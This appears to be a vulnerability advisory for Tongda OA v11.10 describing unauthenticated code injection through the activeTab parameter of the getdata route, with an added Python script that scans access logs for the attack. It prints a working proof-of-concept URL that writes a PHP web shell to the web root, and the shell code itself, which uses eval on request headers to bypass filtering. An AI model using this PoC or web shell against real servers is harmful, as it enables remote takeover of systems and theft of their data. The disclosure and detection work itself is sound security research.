tongda.md


Tongda OA v11.10 has an unauthorized arbitrary file upload vulnerability

Official website: https://www.tongda2000.com/

Version: v11.10

  1. The actionGetdata() method in general\appbuilder\modules\portal\controllers\GatewayController.php takes an activeTab parameter that is controllable by the requester. On line 2018, the activeTab argument is passed into the GetData() method.


The GetData() method looks up the id argument with findall to check whether a matching array exists; if the queried id does exist, execution enters the if statement on line 21. The $attribute argument on line 38 is therefore controllable, which allows the array to be closed early and content to be written to a file via fwrite().


  2. Reproducing the vulnerability

PoC:

```
http://url/general/appbuilder/web/portal/gateway/getdata?activeTab=%e5%27,1%3d%3Efwrite(fopen(%22C:/YAOA/webroot/general/1.php%22,%22w+%22),%22%3C?php%20eval(next(getallheaders()));%22))%3b/*&id=266&module=Carouselimage
```


The PoC writes a PHP file with fwrite(fopen()) by closing the array, and bypasses the global filtering by using a payload that takes no parameters.

```php
<?php eval(next(getallheaders()));
```


Write the 2.php file using the parameterless payload; the file contents are as follows.

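A detection check for the request pattern described above, added here as an example and not part of the original advisory: it scans web access logs for requests to the getdata route whose decoded activeTab value contains the characters needed to close a PHP array and call a function. The log format, the sample lines, the `news` value and the function names are assumptions; the route and the flagged request are the PoC from this page.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Route of the affected action, taken from the PoC on this page.
GETDATA_PATH = "/general/appbuilder/web/portal/gateway/getdata"

# Sequences needed to break out of a PHP array literal and call a function.
# Assumption: legitimate activeTab values never contain any of them.
PHP_BREAKOUT = re.compile(r"""['"]|=>|[();]|/\*|<\?""")

# Request field of a combined-format access log line (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')


def flag_request(uri):
    """Return the decoded activeTab value if it looks like injected PHP, else None."""
    parts = urlsplit(uri)
    if parts.path.rstrip("/").lower() != GETDATA_PATH:
        return None
    # parse_qs percent-decodes; an invalid UTF-8 byte such as %e5 becomes U+FFFD.
    for value in parse_qs(parts.query, keep_blank_values=True).get("activeTab", []):
        if PHP_BREAKOUT.search(value):
            return value
    return None


def scan(log_lines):
    """Return (line_number, decoded_value) for every suspicious log line."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        value = flag_request(match.group(1)) if match else None
        if value is not None:
            hits.append((number, value))
    return hits


# Path and query of the PoC request shown on this page.
POC_URI = (GETDATA_PATH + "?activeTab=%e5%27,1%3d%3Efwrite(fopen(%22C:/YAOA/webroot/"
           "general/1.php%22,%22w+%22),%22%3C?php%20eval(next(getallheaders()));%22))"
           "%3b/*&id=266&module=Carouselimage")

# Constructed sample log lines (addresses and timestamps are made up).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET ' + GETDATA_PATH
    + '?activeTab=news&id=266&module=Carouselimage HTTP/1.1" 200 512',
    '192.0.2.77 - - [01/Jan/2024:10:03:12 +0000] "GET ' + POC_URI + ' HTTP/1.1" 200 0',
    '192.0.2.10 - - [01/Jan/2024:10:04:40 +0000] "GET /general/index.php?q=it%27s HTTP/1.1" 200 90',
]
```

A hit on this route also warrants checking the web root for recently created .php files, since the request writes its payload to disk.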